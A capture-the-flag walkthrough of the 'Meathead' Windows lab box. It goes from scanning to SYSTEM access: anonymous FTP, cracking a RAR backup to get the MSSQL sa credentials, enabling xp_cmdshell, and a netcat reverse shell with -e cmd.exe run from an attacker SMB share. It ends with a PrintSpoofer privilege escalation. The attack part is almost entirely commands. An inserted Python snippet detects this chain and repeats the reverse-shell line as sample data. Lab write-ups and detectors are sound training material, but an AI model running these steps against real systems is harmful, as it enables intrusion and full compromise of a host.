Meathead

ProvingGrounds Windows

nmap -A -p- -oA meathead 192.168.198.70 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA meathead 192.168.198.70

nmap -sU -O -p- -oA meathead-udp 192.168.198.70

nikto -h 192.168.198.70:80

whatweb http://192.168.198.70

At http://192.168.198.70 we see a Plantronics login page.

ftp -p 192.168.198.70 1221

We log in with the credentials anonymous:anonymous

get MSSQL_BAK.rar

unrar e MSSQL_BAK.rar

rar2john MSSQL_BAK.rar

We put the hash in a file called hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

We obtain the password letmeinplease

cat mssql_backup.txt

sa:EjectFrailtyThorn425

python /opt/impacket/examples/mssqlclient.py -port 1435 sa:EjectFrailtyThorn425@192.168.198.70

sp_configure "show advanced", 1

sp_configure "xp_cmdshell", 1

reconfigure

xp_cmdshell "whoami"

cp /home/kali/Desktop/boxes/nc.exe .

We copy the nc binary into the folder we are about to share

xp_cmdshell \\192.168.49.198\smbFolder\nc.exe -e cmd.exe 192.168.49.198 1221

nc -lvnp 1221

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd)
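As an added example (not part of the original writeup), this Python snippet shows the defender's side of the xp_cmdshell chain above: it flags Windows Security 4688-style process-creation records where a shell is spawned by sqlservr.exe, where a process image runs straight from a UNC share, or where nc.exe is started with -e. The sample records are constructed for the example; the field names assume the 4688 event schema.

```python
"""Flag process-creation events that match the xp_cmdshell -> reverse shell chain.

Assumption: events are Windows Security 4688 records already parsed into
dicts carrying NewProcessName, ParentProcessName and CommandLine.
"""
import ntpath

SQL_SERVICE = "sqlservr.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
NET_TOOLS = {"nc.exe", "ncat.exe", "netcat.exe"}


def classify(event):
    """Return a list of finding strings for one 4688 record (empty if benign)."""
    full_image = event.get("NewProcessName", "")
    image = ntpath.basename(full_image).lower()
    parent = ntpath.basename(event.get("ParentProcessName", "")).lower()
    cmdline = event.get("CommandLine", "")
    findings = []
    # xp_cmdshell runs its argument via "cmd.exe /c ..." as a child of sqlservr.exe
    if parent == SQL_SERVICE and image in SHELLS:
        findings.append("shell spawned by SQL Server (xp_cmdshell-style)")
    # An image path starting with \\ was executed from a network share, never staged on disk
    if full_image.startswith("\\\\"):
        findings.append("process image executed from UNC share")
    # nc -e <program> hands that program's stdio to a remote peer
    if image in NET_TOOLS and " -e " in f" {cmdline} ":
        findings.append("netcat started with -e")
    return findings


def scan(events):
    """Return (event_index, findings) for every event that produced a finding."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]


# Constructed sample records modelled on the chain in this writeup
SAMPLE_EVENTS = [
    {"NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "CommandLine": 'cmd.exe /c "whoami"'},
    {"NewProcessName": r"\\192.168.49.198\smbFolder\nc.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"\\192.168.49.198\smbFolder\nc.exe -e cmd.exe 192.168.49.198 1221"},
    {"NewProcessName": r"C:\Windows\System32\cmd.exe",       # benign: interactive shell
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, hits)
```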

whoami /all

We see that SeImpersonatePrivilege is enabled, so we use PrintSpoofer

https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

To find the Windows architecture we run the command above.

cd C:\FTP

copy \\192.168.49.198\smbFolder\PrintSpoofer64.exe

PrintSpoofer64.exe -i -c cmd

type proof.txt

© 2025 Cu3rv0x